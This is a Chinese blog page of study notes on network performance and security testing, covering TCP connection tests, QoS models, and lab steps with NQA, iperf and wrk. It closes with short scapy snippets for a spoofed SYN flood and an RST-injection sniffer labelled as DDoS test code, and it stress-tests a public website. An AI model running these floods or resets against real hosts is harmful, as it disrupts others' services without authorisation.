<h2 id="最大TCP连接建立速率测试方法"><a href="#最大TCP连接建立速率测试方法" class="headerlink" title="最大TCP连接建立速率测试方法"></a>最大TCP连接建立速率测试方法</h2><h3 id="测试目的"><a href="#测试目的" class="headerlink" title="测试目的"></a>测试目的</h3><p>被测设备的CPU使用情况以及对连接的处理速度。</p>
<h3 id="测试过程"><a href="#测试过程" class="headerlink" title="测试过程"></a>测试过程</h3><p>使用二分搜索法</p>
<h2 id="并发TCP连接容量测试方法"><a href="#并发TCP连接容量测试方法" class="headerlink" title="并发TCP连接容量测试方法"></a>并发TCP连接容量测试方法</h2><h3 id="测试目的-1"><a href="#测试目的-1" class="headerlink" title="测试目的"></a>测试目的</h3><p>为了检验被测设备或被测系统内存性能及其连接状态表能同时容纳的最大连接数目。</p>
<h3 id="测试过程-1"><a href="#测试过程-1" class="headerlink" title="测试过程"></a>测试过程</h3><p>使用二分搜索法来确定最大并发TCP连接容量。首先。。。如果（pg115）</p>
<h3 id="采用协议"><a href="#采用协议" class="headerlink" title="采用协议"></a>采用协议</h3><p>HTTP1.1或以上版本 </p>
<p><strong>原因</strong>：</p>
<ol>
<li>HTTP报文通常较小，对带宽的占用较少，</li>
<li>HTTP1.1或以上版本具有默认维持TCP链接的特性，在次特性下才能检测到被检设备所支持的并发TCP连接容量的最大值。</li>
</ol>
<h1 id="第五章-习题"><a href="#第五章-习题" class="headerlink" title="第五章 习题"></a>第五章 习题</h1><ul>
<li>选择题<ul>
<li>第4~7层网络测试关注的重点是面向用户的网络应用部署是否合理</li>
<li>TCP和HTTP 是 4~7层 测试中常用的主要协议</li>
<li>RFC3511 提供了4~7层网络的相关测试方法学</li>
<li>传输层的UDP协议用于网络应用中的非实时业务</li>
<li>并发TCP连接容量，最大TCP连接建立速率和最大TCP连接拆除速率 都是4~7层网络测试主要关注的</li>
<li>突发流量处理，最大同步用户数，最大事务处理速率 是第4~7层网络测试中所关注的HTTP层面上的3个关键指标</li>
</ul>
</li>
</ul>
<ol>
<li>关闭TCP连接方式：三次握手关闭 ，四次握手关闭<br>基本过程：FIN with SEQ → ACK → FIN with SEQ → Ack<br>简化过程：FIN Ack → FIN Ack → ACK</li>
<li>采用哪几种模式对系统进行全方位测试评估：服务器系统模式，网络设备模式，网络系统模式</li>
<li>最大TCP连接建立速率测试期望曲线和当前曲线基本吻合说明了DUT最大连接建立速率已经接近该值</li>
</ol>
<h1 id="第六章-网络安全性能测试"><a href="#第六章-网络安全性能测试" class="headerlink" title="第六章 网络安全性能测试"></a>第六章 网络安全性能测试</h1><h2 id="网络安全的基本概念"><a href="#网络安全的基本概念" class="headerlink" title="网络安全的基本概念"></a>网络安全的基本概念</h2><p>计算机网络安全是指利用各种技术和管理措施，确保网络系统正常运行，从而保证网络数据的可用性、完整性、保密性。</p>
<h2 id="网络入侵"><a href="#网络入侵" class="headerlink" title="网络入侵"></a>网络入侵</h2><p>又称为网络攻击，一般分为网络存取攻击和资源消耗攻击。</p>
<h2 id="网络存取攻击"><a href="#网络存取攻击" class="headerlink" title="网络存取攻击"></a>网络存取攻击</h2><p>通过非法途径获得网络中的资源使用权限或者利用网络从事非法攻击活动，如非法侵入企业内部网络获取商业机密信息等</p>
<h2 id="资源消耗攻击"><a href="#资源消耗攻击" class="headerlink" title="资源消耗攻击"></a>资源消耗攻击</h2><p>攻击者通过某种手段扰乱或者阻止网络系统为用户提供正常服务，如通过DoS攻击方式致使Web服务器瘫痪等</p>
<h2 id="常见的分布式拒绝服务攻击："><a href="#常见的分布式拒绝服务攻击：" class="headerlink" title="常见的分布式拒绝服务攻击："></a>常见的分布式拒绝服务攻击：</h2><p>SYN Flood攻击、Land-based 攻击、Reset Flood攻击、ARP Flood攻击</p>
<h1 id="第七章-网络服务质量测试"><a href="#第七章-网络服务质量测试" class="headerlink" title="第七章 网络服务质量测试"></a>第七章 网络服务质量测试</h1><h2 id="QoS-Quality-of-Service-服务质量🤏🏽"><a href="#QoS-Quality-of-Service-服务质量🤏🏽" class="headerlink" title="QoS(Quality of Service) 服务质量🤏🏽"></a>QoS(Quality of Service) 服务质量🤏🏽</h2><p>定义为网络在传输数据流时要求满足的一系列服务请求，具体可以量化为带宽、时延、时延抖动、吞吐量和丢包率等性能指标。强调传输服务在端到端（end-to-end）或者网络边界到网络边界范围的整体性。服务质量的最终目的就是为各种业务提供可靠的端到端的服务质量保证</p>
<ul>
<li>能够保障要求：<strong>保障服务</strong></li>
<li>能够预测但是不能保障：<strong>预测服务</strong></li>
<li>不完全保障但可达部分服务：<strong>尽力服务</strong></li>
</ul>
<h2 id="节点功能"><a href="#节点功能" class="headerlink" title="节点功能"></a>节点功能</h2><aside>
🚧 节点可能只有部分功能，具体情况由SLA决定

</aside>

<ol>
<li>按照不同业务等级协定SLA提供不同服务</li>
<li>能够满足高优先级业务的资源需求，可以网络资源预约(资源预留)，或拥有相应的资源调度算法</li>
<li>尽量保证高优先级服务不发生丢弃，满足其时延，抖动要求，各个节点有合理的排队算法和队列管理调度算法</li>
</ol>
<h2 id="端到端QoS保证"><a href="#端到端QoS保证" class="headerlink" title="端到端QoS保证"></a>端到端QoS保证</h2><blockquote>
<p>端到端通信：源主机进程到目的主机进程之间的通信</p>
</blockquote>
<p>从结构出发，逐层保证</p>
<h3 id="TCP-IP-结构"><a href="#TCP-IP-结构" class="headerlink" title="TCP/IP 结构"></a>TCP/IP 结构</h3><ul>
<li>802.1P协议头包括一个<strong>三位优先级字段</strong></li>
<li>网络层：IP数据包首部的<strong>TOS</strong>，用于标注优先级</li>
<li>传输层：<strong>端口号</strong>作为传输层提供给应用层的访问点</li>
</ul>
<h2 id="QoS模型"><a href="#QoS模型" class="headerlink" title="QoS模型"></a>QoS模型</h2><ul>
<li>尽力而为服务：无QoS</li>
<li>综合服务模型：信令化/动态QoS</li>
<li>区分服务(DiffServ)模型：预先部署QoS</li>
<li>Diff-IntServ综合模型</li>
</ul>
<h3 id="服务类型🦴"><a href="#服务类型🦴" class="headerlink" title="服务类型🦴"></a>服务类型🦴</h3><ul>
<li>有保证服务(GS)</li>
<li>负载可控服务(CLS)</li>
<li>尽力而为服务(BS)</li>
</ul>
<h2 id="分组分类"><a href="#分组分类" class="headerlink" title="分组分类"></a>分组分类</h2><h3 id="五元组："><a href="#五元组：" class="headerlink" title="五元组："></a>五元组：</h3><p>源/目的IP,源/目的端口,协议类型</p>
<p><strong>原则</strong>：考虑分类粒度和处理开销之间的平衡</p>
<blockquote>
<p>用于分类的字段越多，处理开销越大</p>
</blockquote>
<h2 id="Qos测试"><a href="#Qos测试" class="headerlink" title="Qos测试"></a>Qos测试</h2><aside>
⚠️ 顶层测试：端口测试           底层测试：网元测试

</aside>

<p>$jitter = |(R_xA-T_xA)-(R_xB-T_xB)|$</p>
<p>$R_xA$表示包A的接收时间</p>
<p>$T_xA$表示包A的发送时间</p>
<h2 id="逐跳行为PHB"><a href="#逐跳行为PHB" class="headerlink" title="逐跳行为PHB"></a>逐跳行为PHB</h2><p>根据服务等级协议SLA进行设置，不同PHB有不同的限制，因此需要不同的转发行为</p>
<p>主动队列管理是当前队列管理的热点 WRED算法是当前使用最为广泛的主动队列管理算法</p>
<h1 id="实验"><a href="#实验" class="headerlink" title="实验"></a>实验</h1><h2 id="ensp中运用两个路由进行nqa测试-抖动-时延"><a href="#ensp中运用两个路由进行nqa测试-抖动-时延" class="headerlink" title="ensp中运用两个路由进行nqa测试 抖动/时延"></a><strong>ensp中运用两个路由进行nqa测试 抖动/时延</strong></h2><blockquote>
<p>网络质量分析</p>
</blockquote>
<h3 id="绘制网络拓扑图，连通路由"><a href="#绘制网络拓扑图，连通路由" class="headerlink" title="绘制网络拓扑图，连通路由"></a>绘制网络拓扑图，连通路由</h3><h3 id="R1中建立NQA测试实例"><a href="#R1中建立NQA测试实例" class="headerlink" title="R1中建立NQA测试实例"></a>R1中建立NQA测试实例</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">naq test-instance Elimos lessonwork</span><br><span class="line"></span><br><span class="line">test-type icmp</span><br><span class="line"></span><br><span class="line">destination-address ipv4 1.1.1.1</span><br><span class="line"></span><br><span class="line">frequency 100 <span class="comment"># 配置测试频率位100ms</span></span><br><span class="line"></span><br><span class="line">start now</span><br></pre></td></tr></table></figure>

<h3 id="查看测试结果"><a href="#查看测试结果" class="headerlink" title="查看测试结果"></a>查看测试结果</h3><p> <code>display nqa result lessonwork Elimos 1</code></p>
<h2 id="iperf：udp-tcp带宽测试"><a href="#iperf：udp-tcp带宽测试" class="headerlink" title="iperf：udp/tcp带宽测试"></a><strong>iperf：udp/tcp带宽测试</strong></h2><h3 id="带宽测试"><a href="#带宽测试" class="headerlink" title="带宽测试"></a>带宽测试</h3><ol>
<li>DUTS 分别连接在路由器的两个端口上，配置路由器使DUTS互通</li>
<li>首先配置好DUT:服务器端和客户端，进行iperf软件安装,通常使用</li>
</ol>
<p><code>sudo apt-get install iperf</code>进行安装</p>
<ol>
<li>服务器端运行 <code>iperf -s</code></li>
<li>客户端进行TCP测试<code>iperf -c $serverip -b 2000M -t 1200 -i 1</code></li>
<li>客户端进行UDP测试<code>iperf -c -u $serverip -b 2000M -t 1200 -i 1</code></li>
<li>输出测试结果</li>
</ol>
<ul>
<li>参数解析</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-s      <span class="comment"># 以server模式启动，iperf -s</span></span><br><span class="line">-c host <span class="comment"># 以client模式启动，host是server端</span></span><br></pre></td></tr></table></figure>

<ul>
<li>通用参数：</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">-f <span class="comment"># [kmKM] 分别表示以Kbits, Mbits, KBytes, MBytes显示报告，默认以Mbits为单位,</span></span><br><span class="line">-i <span class="comment"># sec 以秒为单位显示报告间隔</span></span><br><span class="line">-l <span class="comment"># 缓冲区大小，默认是8KB,</span></span><br><span class="line">-m <span class="comment"># 显示tcp最大mtu值</span></span><br><span class="line">-o <span class="comment"># 将报告和错误信息输出到文件</span></span><br><span class="line">-p <span class="comment"># 指定服务器端使用的端口或客户端所连接的端口</span></span><br><span class="line">-u <span class="comment"># 使用udp协议</span></span><br><span class="line">-w <span class="comment"># 指定TCP窗口大小，默认是8KB</span></span><br><span class="line">-B <span class="comment"># 绑定一个主机地址或接口（当主机有多个地址或接口时使用该参数）</span></span><br><span class="line">-C <span class="comment"># 兼容旧版本（当server端和client端版本不一样时使用）</span></span><br><span class="line">-M <span class="comment"># 设定TCP数据包的最大mtu值</span></span><br><span class="line">-N <span class="comment"># 设定TCP不延时</span></span><br><span class="line">-V <span class="comment"># 传输ipv6数据包</span></span><br></pre></td></tr></table></figure>

<ul>
<li>server专用参数</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-D <span class="comment">#  以服务方式运行。</span></span><br><span class="line">-R <span class="comment"># 停止iperf服务。针对-D</span></span><br></pre></td></tr></table></figure>

<ul>
<li>client端专用参数</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">-d <span class="comment"># 同时进行双向传输测试</span></span><br><span class="line">-n <span class="comment"># 指定传输的字节数，</span></span><br><span class="line">-r <span class="comment"># 单独进行双向传输测试</span></span><br><span class="line">-t <span class="comment"># 测试时间，默认20秒,</span></span><br><span class="line">-F <span class="comment"># 指定需要传输的文件</span></span><br><span class="line">-T <span class="comment"># 指定ttl值</span></span><br></pre></td></tr></table></figure>

<h2 id="分析基于http测试工具WRK进行网站压力测试结果"><a href="#分析基于http测试工具WRK进行网站压力测试结果" class="headerlink" title="分析基于http测试工具WRK进行网站压力测试结果"></a><strong>分析基于</strong>http测试工具WRK<strong>进行网站压力测试结果</strong></h2><blockquote>
<p>压力测试</p>
</blockquote>
<h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><blockquote>
<p>Debian</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install wrk</span><br></pre></td></tr></table></figure>

<blockquote>
<p>Others</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://pkgs.org/download/wrk">Wrk Download (APK, DEB, RPM, XBPS, ZST)</a></p>
<h3 id="命令"><a href="#命令" class="headerlink" title="命令"></a>命令</h3><p>验证安装</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">elimos@pixel:~$ wrk -v</span><br><span class="line">wrk debian/4.1.0-3 [epoll] Copyright (C) 2012 Will Glozer</span><br><span class="line">Usage: wrk &lt;options&gt; &lt;url&gt;                            </span><br><span class="line">  Options:                                            </span><br><span class="line">    -c, --connections &lt;N&gt;  Connections to keep open   </span><br><span class="line">    -d, --duration    &lt;T&gt;  Duration of <span class="built_in">test</span>           </span><br><span class="line">    -t, --threads     &lt;N&gt;  Number of threads to use   </span><br><span class="line">                                                      </span><br><span class="line">    -s, --script      &lt;S&gt;  Load Lua script file       </span><br><span class="line">    -H, --header      &lt;H&gt;  Add header to request      </span><br><span class="line">        --latency          Print latency statistics   </span><br><span class="line">        --<span class="built_in">timeout</span>     &lt;T&gt;  Socket/request <span class="built_in">timeout</span>     </span><br><span class="line">    -v, --version          Print version details      </span><br><span class="line">                                                      </span><br><span class="line">  Numeric arguments may include a SI unit (1k, 1M, 1G)</span><br><span class="line">  Time arguments may include a time unit (2s, 2m, 2h)</span><br></pre></td></tr></table></figure>

<h3 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h3><p><code>wrk -t 10 -d 10s -c 2000 --latency [https://baidu.com](https://baidu.com/)</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 测试结果</span></span><br><span class="line">Running 10s <span class="built_in">test</span> @ https://baidu.com</span><br><span class="line">  10 threads and 800 connections</span><br><span class="line">  Thread Stats   Avg      Stdev     Max   +/- Stdev</span><br><span class="line">    Latency    75.51ms   20.79ms 420.43ms   90.16%</span><br><span class="line">    Req/Sec   199.38    167.78   656.00     63.09%</span><br><span class="line">  Latency Distribution</span><br><span class="line">     50%   71.54ms</span><br><span class="line">     75%   80.01ms</span><br><span class="line">     90%   91.93ms</span><br><span class="line">     99%  144.13ms</span><br><span class="line">  12012 requests <span class="keyword">in</span> 10.06s, 4.09MB <span class="built_in">read</span></span><br><span class="line">Requests/sec:   1193.73</span><br><span class="line">Transfer/sec:    416.12KB</span><br></pre></td></tr></table></figure>

<h3 id="命令解析"><a href="#命令解析" class="headerlink" title="命令解析"></a>命令解析</h3><ul>
<li>d <time></li>
</ul>
<blockquote>
<p>测试时间 支持s秒 m分 h时</p>
</blockquote>
<ul>
<li>t <treads></li>
</ul>
<blockquote>
<p>线程数</p>
</blockquote>
<ul>
<li>c <connections></li>
</ul>
<blockquote>
<p>连接数</p>
</blockquote>
<ul>
<li>latency</li>
</ul>
<blockquote>
<p>显示分布式相应信息</p>
</blockquote>
<h3 id="结果解析"><a href="#结果解析" class="headerlink" title="结果解析"></a>结果解析</h3><p>进行了30s的对baidu.com的压力测试，使用了12线程并发400连接，单一线程平均耗时933.14ms，最高延迟2s，在30秒内发送了发送了8181个请求，读取到了121.83MB,无套接字错误，平均请求速率是271.82/s,转发速率4.05MB/s</p>
<p>如图</p>
<p><img src="https://pic.imgdb.cn/item/62c002855be16ec74a3a6e90.png" alt="wrkimage.bmp"></p>
<ul>
<li>Tread Stats</li>
</ul>
<blockquote>
<p>线程状态</p>
</blockquote>
<ul>
<li>Avg</li>
</ul>
<blockquote>
<p>平均时间</p>
</blockquote>
<ul>
<li>stdev</li>
</ul>
<blockquote>
<p>标准差</p>
</blockquote>
<ol start="4">
<li>结果分析</li>
</ol>
<ul>
<li>Tread Stats 线程状态</li>
<li>Avg 平均时间</li>
<li>+/- stdev 标准差</li>
</ul>
<h2 id="基于scapy进行的-syn-rst-flood测试代码"><a href="#基于scapy进行的-syn-rst-flood测试代码" class="headerlink" title="基于scapy进行的 syn/rst flood测试代码"></a><strong>基于scapy进行的 syn/rst flood测试代码</strong></h2><h3 id="SYN"><a href="#SYN" class="headerlink" title="SYN"></a>SYN</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># SYN : 请求同步 DDoS攻击</span></span><br><span class="line"></span><br><span class="line">sport = random.randint(<span class="number">1</span>,<span class="number">65535</span>)</span><br><span class="line"></span><br><span class="line">ip = IP(src=src,dst=dst)</span><br><span class="line"></span><br><span class="line">tcp = TCP(sport = sport ,dport = dport)</span><br><span class="line"></span><br><span class="line">SYN = ip /tcp</span><br><span class="line"></span><br><span class="line">SYN.summary()</span><br><span class="line"></span><br><span class="line">send(SYN , verbose = <span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<h3 id="RST-Flood"><a href="#RST-Flood" class="headerlink" title="RST Flood"></a>RST F<strong>lood</strong></h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment"># 构建大量SYN标志位的TCP报文进行DDoS攻击</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">poison</span>(<span class="params">packet</span>):</span><br><span class="line"></span><br><span class="line">packet[TCP].flags=<span class="string">&#x27;R&#x27;</span></span><br><span class="line"></span><br><span class="line">sendp(packet)</span><br><span class="line"></span><br><span class="line">sniff(<span class="built_in">filter</span>=<span class="string">&#x27;tcp&#x27;</span>,prn=poison)</span><br></pre></td></tr></table></figure> 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          Donate
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://elimos.cn/2022/07/02/%E7%BD%91%E7%BB%9C%E6%B5%8B%E8%AF%95%E4%B8%8E%E8%AF%84%E4%BB%B7/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Learning/" rel="tag">Learning</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Network/" rel="tag">Network</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2022/07/02/%E7%BD%91%E7%BB%9C%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91%E4%B8%8E%E7%B3%BB%E7%BB%9F%E9%9B%86%E6%88%90/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            网络应用开发与系统集成
          
        </div>
      </a>
    
    
      <a href="/2022/07/02/%E8%B7%AF%E7%94%B1%E4%B8%8E%E4%BA%A4%E6%8D%A2/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">路由与交换</div>
      </a>
    
  </nav>

  
   
    
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2022
        <i class="ri-heart-fill heart_icon"></i> Elimos
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Elimos&#39;Home"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/photos">摄影</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.png">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.png">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->
 <script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

